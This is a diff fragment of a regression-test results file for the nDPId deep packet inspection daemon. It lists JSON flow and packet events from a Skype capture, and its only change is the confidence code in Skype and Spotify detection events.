00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3VkAAEARCjDAqAEinTg0LzLdnF0AHgzhnBwC9HB1yp1CFIBUD5AqeEDWvWy7jA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} @@ -397,64 +397,64 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SW0AAEAR5iPAqAEi1cezjTLdnE8AKQ5hnB4CGyqpujGNRC+tNfD9NfpLzFflMbzl80z6vtvIbjHD"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5JaMAAEARO5vAqAEiQAQXqDLdnEYAJeE7nCAClYKeY8U7yQoFLZ\/n5OmCV2u37neBgVGbscg="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/+CwAAEAR6vHAqAEinTc4jjLdnFcAKxxKnCIC+gceuOzI36Gk6bxAzIG\/CfJN2Kdzd\/KAG2cg42HExgA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0paYAAEARVdzAqAEib91NjzLdnFYAIE1nnCQCSJLvZtGpgN01LZemo1XXZO+oxg0w"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAABBc7oAAEARJM\/AqAEiQTffITLdnEsALfH+nCYCgzglH2UUEeAloaKWvjnBLcR69MpntGSFdWneylROBFqJdg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuzMAAEARQDfAqAEib91NmzLdnEQALFAWnCgCEvePRGLJGr6Sre+ODORDkQCce9O5GJ9D557YPiPEFuAx"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/2XIAAEARv6rAqAEinTeCjzLdnFEAK32DnCoCUchv5aDS7Qgi\/2x8dTOyi7BA\/ZCxsEvRrtCtnVEnyoU="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431969668503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969668503,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABItzYAAEARPsPAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} 